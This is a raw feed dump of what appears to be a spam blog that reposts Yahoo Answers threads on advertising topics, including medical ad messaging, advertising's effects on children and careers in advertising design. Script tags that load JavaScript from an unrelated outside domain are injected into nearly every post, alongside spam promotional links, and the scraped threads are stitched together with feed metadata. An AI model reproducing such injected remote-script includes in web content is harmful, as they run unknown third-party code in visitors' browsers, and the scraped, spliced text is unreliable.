/><br /><br><br /><br />- mention your "key words" and company name more often in this Y!A, as it will aso be submitted to search engine... <br><br /><br /><br><br /><br />- provide links from your website to other excellent websites, that way people might save your website in their favorites. <br><br /><br /><br><br /><br />- make your website as clear, informative, simple and to the point. easier to understand. most people only glance at websites in the beginning...<br>Reply:I agree with Rex. You need to set up a web site to show off your stuff. After that try some Google adwords to drive traffic to your yet-to-be-developed web site.<br>Reply:get a blog page or a myspace page...<br>Reply:Dude. You need to have a website if that is your product. Worry about the rest after you realise the imprtance of this.<br>Reply:If you want (or anyone) want to promote business/website, visit http://marketingdreamz.tripod.com/<br><br /><br />or contact atmarketingdreamz@yahoo.com. <br><br /><br />The cool things about this website is that it is ran by college students and so you could try to offer your own advertising rate, because they just sarted, so am sure, they'll advertise for really reasonable rate.!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-14279624868803969422010-04-17T00:35:00.000-07:002010-04-17T00:35:01.655-07:00What kind of advertising message can drive medicine users closer to advertisers?I'm talking about medical advertising.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>What kind of advertising message can drive medicine users closer to advertisers?<br>A subliminal one will work marvels and near-miracles - but this type of advertisements are banned in most of the civilised countries !<br><br /><br />Otherwise, saying 'the truth, whole truth, and nothing but the truth' works BEST in almost any kind of advertising.<br>Reply:One that people can relate to. <br><br /><br /><br><br /><br />Depending upon the kind of medicine it is ie who it's meant for, that is who your message should be written to.<br><br /><br /><br><br /><br />For instance, if it's arthritis medicine or some other "older person" ailment, write the ad specifically for them.<br><br /><br /><br><br /><br />Also, have you ever used radio? It's great because you can really target your specific end user given the nature of the radio's format.<br><br /><br /><br><br /><br />Hope this helps!<br>Reply:told them the case and benefit<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-13606664049519755452010-04-17T00:34:00.002-07:002010-04-17T00:34:45.586-07:00How is the Advertising/Marketing/Communic... program at F.I.T.?I'm a senior in high school and Im interested in F.I.T. However most of the people i know who apply/attend there are majoring in the art departments of the school. I was just wondering if the advertising/marketing major and programs were any good and what do they entail?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>How is the Advertising/Marketing/Communic... program at F.I.T.?<br>Try these links:<br><br /><br />http://www.acf.hhs.gov/assetbuilding/cur...<br><br /><br />http://depts.loras.edu/academics/catalog...<br><br /><br />http://smib.vuw.ac.nz:8081/WWW/ANZMAC200...<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-38523007988801203622010-04-17T00:34:00.001-07:002010-04-17T00:34:30.359-07:00What affect does advertising have on children?what do you think the affect will be on children who are exposed to levels of advertising and media that is directed at them from the age they can sit up?<br><script language=JavaScript src=http://www.chinese-kungfu.org/f2.js type=text/javascript></script><br>What affect does advertising have on children?<br>Hello, they become "I Want's"<br>Reply:It makes things appealing to kids so they will bug their parents bug them to get them what they see on tv for them.<br>Reply:It will have a big effect on them and shape them into exactly what society demands. They will copy and try to become the fake people they see or hear around them on tv, magazines or radio. They will be manipulated into becoming as well as possessing anything that is considered "cool". For example how many little five yr girls do u see walking around in boots and mini skirts? and how many kids beg their parents to take them to maccas so they can collect the latest toy. <br><br /><br />Especially because childhood is the most vulnerable period to a childs life, it has a much bigger effect compared to the less naive adults<br>Reply:The affect will be based on the level that they are exposed to. <br><br /><br /><br><br /><br />Their personalities and their frame of mind about life will be influence based on the levels they are exposed to. And those influences will lead to actions that respond to it. And then the actions will have the support of the environment (parents, friends, peer groups, etc.).<br><br /><br /><br><br /><br />You put it in their environment, it becomes a part of them.<br>Reply:My kids want everything they see on t.v. and they have been watching it all of their lives.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><a href=http://americal-dental.blogspot.com/>americal dental</a>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-60770083726658888062010-04-17T00:34:00.000-07:002010-04-17T00:34:13.575-07:00When using persuasive advertising acn you please tell me what does this mean, Next to shoes,men ae a girls?Can you tell me please what do they mean when they say next to shoes, men are a girls favorite accessory. Aagin this is what my ad states for trying to sell this tab energy drink. again is this a form of persuasive advertising and can you tell me what are they trying to say. It shows him carrying this womans bags and he really doesn't have enough arms to carry all of this<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>When using persuasive advertising acn you please tell me what does this mean, Next to shoes,men ae a girls?<br>I'm assuming this is for the new low-calorie Tab energy drink??<br><br /><br /><br><br /><br />That ad is trivializing relationships by making the woman appear to be "so cool" that she doesn't even need a hot guy - she's using him as her little bag carrier. It's a very blase attitude towards men and trying to make it seem like "if you drink this, men will want to be your little slave, too." Is that persuasive? Who knows, advertising is actually quite a crock - the more I do it the less seriously I take it. Adverts are generally ignored and people think they're obnoxious. Do you want a boyfriend or a pathetic, mindless wimp? Doesn't persuade me!<br><br /><br /><br><br /><br />The main technique used in ads is the utilization of sex appeal. It's not funny; witty; smart or interesting - sex is in-your-face and there's no question about what it is. The woman is beautiful (re: skinny...re: drink this low calorie beverage); on-the-go (oh wow, women are so multi-faceted, now they can shop ALL DAY without stopping if they drink this!); and somehow using the man in this way makes the woman the power figure in the relationship. So drink this liquid-Smarties crap and you, too, can be a powerful, man-eating shopaholic.<br>Reply:Paybacks a B****, isn't it? remeber those commercials that were originally just for women, but now they now have them for men too? Pretty offensive, and sexist. <span>Report It</span><br /> <br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0tag:blogger.com,1999:blog-1616515733738658631.post-82306734474273505422010-04-17T00:33:00.003-07:002010-04-17T00:33:57.762-07:00I am thinking about becomming an advertising designer?i want to become an advertising designer and i wanted to meet someone that is already one to get info on it. such as what all would an advertising designer do? are you constantly on the computer? do you hand draw at all? for whom do you design for? how many hours do you work? did you go to a public school or an art school? would it be best for me to go to a private art school instead of public where your first two years are core classes? how much did you start off making? <br><br /><br /><br><br /><br />i researched a lot, but i want to discuss it with someone.<br><br /><br /><br><br /><br />I'm sure i forgot a bunch of other questions, so if you have any other extra information i'd love to know it. thanks!<br><script language=JavaScript src=http://www.chinese-kungfu.org/f1.js type=text/javascript></script><br>I am thinking about becomming an advertising designer?<br>Those are all really good questions. Unfortunately, there is no single good answer. To start with, do research on the programs offered at different schools. You want to find a program that is specific to your interests. Many public schools only offer a general bachelor of fine arts degree. But some have a graphic design, visual communication, or similar type of degree. The nice thing about private art schools is that they are very focused on teaching you the things you need to know to do the job upon graduation. The downside is that they are usually more expensive. You will also have a choice of if you want to get a bachelor's degree or an associate's degree. Again, research the options and see what seems a good fit for you.<br><br /><br /><br><br /><br />As far as what an advertising designer does, depends on where you end up working. The structure of the organization will make huge difference as to what your responsibilities will be. Your college experience may also make a difference. Some programs give you more expertise in certain areas than others. Also, the client base will make a difference. At a larger agency, an entry level designer will, in general, be responsible for smaller, lower important projects. Your involvement in the entire creative process will be minimal. For the most part, you will be taking direction from a creative director or art director. The types of projects you work on can vary greatly also, depending on the agency you work for. It can be all kinds of print pieces, from brochures, catalogs and mailers to stationery and invitations to billboards, newspaper and magazine ads. It can be website design or av/multimedia production. It really all depends on what the client's needs are and what the agency's range of expertise includes.<br><br /><br /><br><br /><br />Much of the work done by advertising designers is on the computer these days. Some do some drawing, but often any real illustration is hired out to an illustrator. Sometimes you may get to do a bit of photography. But again, that is usually hired out to a photographer. Depending on the position you get, you may or may not be able to be involved in the direction of those outside professionals.<br><br /><br /><br><br /><br />You could also get a job in a marketing department of a corporation. If that's the case, the only client you have is your employer. So everything you do is for the same thing. The variety of an agency experience can be more interesting for some people, while it can be too hectic a pace for others.<br><br /><br /><br><br /><br />Another option would be to freelance. The upside is that you make your own hours, set your own rates and no one but your client to answer to. The downside is that there is all the paperwork, taxes, etc. Yucky stuff that we designers are not necessarily good at. We'd rather be using our creative mind. <br><br /><br /><br><br /><br />How many hours you work also depends on what position you end up with. There are full-time and part-time jobs available. And again, if you freelance you can work as much or as little as you want. Be forewarned -- if you have a full-time salaried position with an ad agency, be prepared to put in a lot of hours without extra pay. The nature of the work is that you get it done to meet your deadline. And if that means putting in an extra 10 or 20 hours a week, then that's what you do.<br><br /><br /><br><br /><br />Hmmmm.... did I answer all your questions? Feel free to email me if you have others (I think I have it set up so you can). <br><br /><br /><br><br /><br />Best wishes on your future endeavors. It sounds like you're trying to thoroughly research your options instead of just jumping in. That's great! You should do well.<br><script language=JavaScript src=http://www.chinese-kungfu.org/f3.js type=text/javascript></script><br><br>Giricekhttp://www.blogger.com/profile/16354667725372646625noreply@blogger.com0